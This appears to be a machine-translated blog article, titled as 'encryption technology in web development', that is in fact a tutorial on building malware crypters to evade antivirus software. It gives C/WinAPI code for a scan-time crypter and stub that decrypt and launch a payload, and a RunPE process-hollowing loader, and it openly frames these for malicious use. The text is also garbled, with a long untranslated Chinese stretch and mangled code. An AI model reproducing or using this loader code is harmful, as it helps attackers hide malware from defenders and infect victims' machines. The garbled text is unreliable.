Shulou(Shulou.com)05/31 Report--

This article mainly introduces the example analysis of encryption technology in web development, which has a certain reference value, and interested friends can refer to it. I hope you will gain a lot after reading this article.

Two aspects of cryptography

When we talk about our impressions of cryptography, we often think that "this is a means of processing information to prevent it from being leaked." Most of us regard it as a defense mechanism, and its purpose is to ensure the security of information and prevent malicious attacks. Of course, we are well aware of this, because it was invented for the sole purpose of protecting data, but, as we will see soon, cryptography is much more than that.

If we use traditional cryptography to carry out malicious attacks, that is, to design malicious software and take advantage of the advantages provided by cryptography. These types of malware, including ransomware and asymmetric backdoors, are very common in modern times, and they are mainly related to public key cryptography.

Antivirus mechanism

In order to design a way to bypass antivirus software, we must first understand the antivirus method of antivirus software. I will briefly introduce the two main methods used by antivirus software detection applications.

Signature-based detection

As the name implies, signature-based detection is a technique that cross-references the signature of an application to the corresponding database of known malware. This is an effective measure to prevent and contain malware that has appeared before.

Based on heuristic detection

While signature-based detection can prevent most previously known malware, it also has drawbacks because malware authors can add protection against this approach, such as the use of polymorphisms and metamorphic code. Heuristic-based detection monitors the behavior and characteristics of the application and matches it with known malicious behavior. Note that this detection occurs only if the application is running.

Of course, antivirus software is much more advanced than this. Since this is beyond the scope of the article and beyond my understanding, this information will not be covered here.

Brief introduction of encryption Technology

The encryptor is a software designed to protect the internal information of the file, and after execution, it can provide complete information after it is extracted by the decryption program. Note that although the cryptographer can be used for malicious purposes, it is also mainly used to confuse data and prevent reverse engineering of software. In this article, we will focus on malicious uses. So how does this work? Let's first look at the various parts of the encoder and see what they do.

The cipher is responsible for encrypting the target object.

+-+ + | Your file |-> | Crypter | = > | Encrypted file | + | Stub | +-+-+ -+ +-+ | Encrypted file | + | Stub | = Execution = > | Original File | +-+ +-+ encipher when scanning

These types of cryptographers are called ciphers when scanning because they can encrypt data on disk, and antivirus software can scan files, such as signature-based detection. At this stage, as long as the confusion technology is powerful enough, antivirus software will never be able to detect any malicious activity.

Runtime cipher

These cryptographers take encryption technology to a new level and can encrypt data as needed while running in memory. By doing so, malware can be loaded and executed before the antivirus software responds. At this stage, an application can quickly run its payload and achieve its goals. However, it is entirely possible for malware to trigger heuristic-based detection strategies for antivirus software at run time, so malware writers should be careful.

Now that we have introduced the high-level content, let's take a look at examples of these two types.

Write scan time cipher

The cipher is relatively simple of the two when scanning, because it does not require virtual memory and process / thread knowledge. In essence, stub processes the file, puts it somewhere on disk, and then executes it. The following is a record of the design of an encipher during scanning.

Note: for brevity and readability, the content will not contain error checking.

Cryptographer and stub pseudo code 1. Check if there is a command line argument +-> 2. If there are command line parameters, encrypt the file as an encrypted device. 3. Open the target file | 4. Read the contents of the file | 5. Encrypt the contents of the file | 6. Create a new file | 7. Write the encrypted file to a new file | 8. End of bundle | +-> 2. If there are no command line arguments, then as stub 3. 0. Open the encrypted file 4. Read the contents of the file 5. Decrypt the contents of the file 6. Create a temporary file 7. Write the decrypted content to the temporary file 8. Executive document 9. Complete

This design implements both the cipher and stub in the same executable file, and we can do this because the two operations are very similar. Let's use the code to introduce the design.

First, we need to define main and two conditions that define whether to execute the cipher or stub.

Int APIENTRY WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {if (_ _ argc)

< 2) { // stub routine } else { // crypter routine } return EXIT_SUCCESS;} 由于我们将应用程序设计成了窗口应用程序，我们不能像通常基于控制台的应用程序中那样检索 argc 和 argv，但是微软提供了使用 argc 和 argv的解决方案。如果命令行参数 __argv[1] 存在，应用程序将尝试对指定的文件进行加密，否则，它将尝试解密一个被加密的文件。 接下来是加密程序，我们需要 __argv[1] 来指定文件的句柄和它的大小，这样我们就可以把它的字节复制到一个缓冲区中进行加密。 int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { if (__argc < 2) { // stub routine } else { // crypter routine // open file to crypt HANDLE hFile = CreateFile(__argv[1], FILE_READ_ACCESS, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); // get file size DWORD dwFileSize = GetFileSize(hFile, NULL); // crypt and get crypted bytes LPVOID lpFileBytes = Crypt(hFile, dwFileSize); } return EXIT_SUCCESS;} Crypt函数主要是将文件内容读入到一个缓冲区中，然后对其进行加密，然后返回一个指向缓冲区的指针。 LPVOID Crypt(HANDLE hFile, DWORD dwFileSize) { // allocate buffer for file contents LPVOID lpFileBytes = malloc(dwFileSize); // read the file into the buffer ReadFile(hFile, lpFileBytes, dwFileSize, NULL, NULL); // apply XOR encryption int i; for (i = 0; i < dwFileSize; i++) { *((LPBYTE)lpFileBytes + i) ^= Key[i % sizeof(Key)]; } return lpFileBytes;} 现在我们有了加密的字节，我们需要创建一个新的文件，然后将这些字节写入其中。 int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { if (__argc < 2) { // stub routine } else { // crypter routine ... // get crypted file name in current directory CHAR szCryptedFileName[MAX_PATH]; GetCurrentDirectory(MAX_PATH, szCryptedFileName); strcat(szCryptedFileName, "\\"); strcat(szCryptedFileName, CRYPTED_FILE); // open handle to new crypted file HANDLE hCryptedFile = CreateFile(szCryptedFileName, FILE_WRITE_ACCESS, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); // write to crypted file WriteFile(hCryptedFile, lpFileBytes, dwFileSize, NULL, NULL); CloseHandle(hCryptedFile); free(lpFileBytes); } return EXIT_SUCCESS;} 加密器部分差不多就是这些了。注意，我们使用了一个简单的XOR来加密文件的内容，如果我们能够获得密钥，这种方案的安全性可能是不够的。如果我们想更加安全，我们可以使用其他的加密方案，如(x)TEA。我们不需要完整的加密算法，因为我们的目的是为了避免基于签名的检测，因此这么做完全是矫枉过正。保持文件小而简单最重要。 让我们继续进入stub例程。对于stub程序，我们要检索当前目录下的加密文件，然后将解密后的内容写入一个临时文件中进行执行。 我们首先要得到当前的要处理的文件，然后打开文件，得到文件大小。 int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { if (__argc < 2) { // stub routine // get target encrypted file CHAR szEncryptedFileName[MAX_PATH]; GetCurrentDirectory(MAX_PATH, szEncryptedFileName); strcat(szEncryptedFileName, "\\"); strcat(szEncryptedFileName, CRYPTED_FILE); // get handle to file HANDLE hFile = CreateFile(szEncryptedFileName, FILE_READ_ACCESS, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); // get file size DWORD dwFileSize = GetFileSize(hFile, NULL); } else { // crypter routine } return EXIT_SUCCESS;} 和加密器例程差不多。接下来，我们要读取文件内容，并得到解密后的字节。由于XOR操作恢复了给定的公共位的值，我们可以简单地重用Crypt函数。之后，我们需要创建一个临时文件，并将解密后的字节写入其中。 int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { if (__argc < 2) { // stub routine ... // decrypt and obtain decrypted bytes LPVOID lpFileBytes = Crypt(hFile, dwFileSize); CloseHandle(hFile); // get file in temporary directory CHAR szTempFileName[MAX_PATH]; GetTempPath(MAX_PATH, szTempFileName); strcat(szTempFileName, DECRYPTED_FILE); // open handle to temp file HANDLE hTempFile = CreateFile(szTempFileName, FILE_WRITE_ACCESS, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); // write to temporary file WriteFile(hTempFile, lpFileBytes, dwFileSize, NULL, NULL); // clean up CloseHandle(hTempFile); free(lpFileBytes); } else { // crypter routine } return EXIT_SUCCESS;} 最后，我们需要执行解密后的应用程序。 int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { if (__argc < 2) { // stub routine ... // execute file ShellExecute(NULL, NULL, szTempFileName, NULL, NULL, 0); } else { // crypter routine } return EXIT_SUCCESS;} 请注意，一旦解密后的应用程序被写入磁盘，它很有可能被杀毒软件的基于签名的检测方式检测出来，因此这样有可能捕获大多数的恶意软件。正因为如此，恶意软件的作者需要编写即使他们的应用程序在这种情况下仍然能够执行的功能。 扫描时加密器就到此为止。 编写一个运行时加密器 对于运行时加密器，我的文章只涉及stub，因为它还包括更复杂的过程，所以我们将假设应用程序已经被加密。这些加密器使用一种叫做RunPE的流行技术。它的工作原理是stub先解密应用程序的加密字节，然后模拟Windows加载器，将它们推送到暂停进程的虚拟内存空间中。这个过程完成后，stub将把暂停的进程恢复运行。 注意：为了简洁和可读性，我将不包含错误检查。 stub伪代码1. Decrypt application2. Create suspended process3. Preserve process's thread context4. Hollow out process's virtual memory space5. Allocate virtual memory6. Write application's header and sections into allocated memory7. Set modified thread context8. Resume process9. Finish 我们可以看到，这需要相当多的Windows内部知识，包括PE文件结构、Windows内存操作和进程/线程的知识。我强烈建议读者在理解这些知识的基础上来理解下面的材料。 首先，让我们在main中设置两个例程，一个用于解密被加密的应用程序，另一个用于将其加载到内存中执行。 APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { Decrypt(); RunPE(); return EXIT_SUCCESS;} Decrypt函数实现方式完全依赖于用于应用程序的加密方式，这里是一个使用XOR的示例代码。 VOID Decrypt(VOID) { int i; for (i = 0; i < sizeof(Shellcode); i++) { Shellcode[i] ^= Key[i % sizeof(Key)]; }} 现在，应用程序已经被解密，让我们来看看神奇的地方。在这里，我们通过检查DOS和PE签名来验证该应用程序是否是一个有效的PE文件。 VOID RunPE(VOID) { // check valid DOS signature PIMAGE_DOS_HEADER pidh = (PIMAGE_DOS_HEADER)Shellcode; if (pidh->

E_magic! = IMAGE_DOS_SIGNATURE) return; / / check valid PE signature PIMAGE_NT_HEADERS pinh = (PIMAGE_NT_HEADERS) ((DWORD) Shellcode + pidh- > e_lfanew); if (pinh- > Signature! = IMAGE_NT_SIGNATURE) return;}

Now we will create a paused process.

VOID RunPE (VOID) {. / / get own full file name CHAR szFileName [Max _ PATH]; GetModuleFileName (NULL, szFileName, MAX_PATH); / / initialize startup and process information STARTUPINFO si; PROCESS_INFORMATION pi; ZeroMemory (& si, sizeof (si)); ZeroMemory (& pi, sizeof (pi)); / / required to set sizeof si.cb before use si.cb = sizeof (si) / create suspended process CreateProcess (szFileName, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, & si, & pi);}

Note that szFileName can be the full path to any executable file, such as explorer.exe or iexplore.exe, but in this case, we will use stub's file. The CreateProcess function will create a child process of the specified file in a paused state so that we can modify its virtual memory contents according to our own needs.

VOID RunPE (VOID) {. / / obtain thread context CONTEXT ctx; ctx.ContextFlags = CONTEXT_FULL; GetThreadContext (pi.Thread, & ctx);}

Now let's clear the virtual memory area of the process so that we can allocate our own running space for the application. To do this, we need a function that is not ready-made to us, so we need a function pointer to a function that dynamically retrieves content from the ntdll.dll file.

Typedef NTSTATUS (* fZwUnmapViewOfSection) (HANDLE, PVOID); VOID RunPE (VOID) {/ / dynamically retrieve ZwUnmapViewOfSection function from ntdll.dll fZwUnmapViewOfSection pZwUnmapViewOfSection = (fZwUnmapViewOfSection) GetProcAddress (GetModuleHandle ("ntdll.dll"), "ZwUnmapViewOfSection"); / / hollow process at virtual memory address' pinh- > OptionalHeader.ImageBase' pZwUnMapViewOfSection (pi.hProcess, (PVOID) pinh- > OptionalHeader.ImageBase) / / allocate virtual memory at address' pinh- > OptionalHeader.ImageBase' of size `pinh- > OptionalHeader.SizeofImage` with RWX permissions LPVOID lpBaseAddress = VirtualAllocEx (pi.hProcess, (LPVOID) pinh- > OptionalHeader.ImageBase, pinh- > OptionalHeader.SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);}

Because the paused process has its own content in its virtual memory space, we need to de-map it from memory and then allocate our own content so that we have access to load the image of our application. We will do this through the WriteProcessMemory function. First, like the Windows loader, we need to write the header file first, and then write each part separately. This section requires a comprehensive understanding of the PE file structure.

VOID RunPE (VOID) {. / / write header WriteProcessMemory (pi.hProcess, (LPVOID) pinh- > OptionalHeader.ImageBase, Shellcode, pinh- > OptionalHeader.SizeOfHeaders, NULL); / / write each section int i; for (I = 0; I

< pinh->

FileHeader.NumberOfSections; iTunes +) {/ / calculate and get ith section PIMAGE_SECTION_HEADER pish = (PIMAGE_SECTION_HEADER) ((DWORD) Shellcode + pidh- > e_lfanew + sizeof (IMAGE_NT_HEADERS) + sizeof (IMAGE_SECTION_HEADER) * I); / / write section data WriteProcessMemory (pi.hProcess, (LPVOID) (lpBaseAddress + pish- > VirtualAddress), (LPVOID) ((DWORD) Shellcode + pish- > PointerToRawData), pish- > SizeOfRawData, NULL);}}

Now that everything is in place, we just need to change the pointcut address of the context and resume the paused thread.

VOID RunPE (VOID) {. / / set appropriate address of entry point ctx.Eax = pinh- > OptionalHeader.ImageBase + pinh- > OptionalHeader.AddressOfEntryPoint; SetThreadContext (pi.hThread, & ctx); / / resume and execute our application ResumeThread (pi.hThread) } Thank you for reading this article carefully. I hope the article "sample Analysis of encryption Technology in web Development" shared by the editor will be helpful to you. At the same time, I also hope you will support us and pay attention to the industry information channel. More related knowledge is waiting for you to learn!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.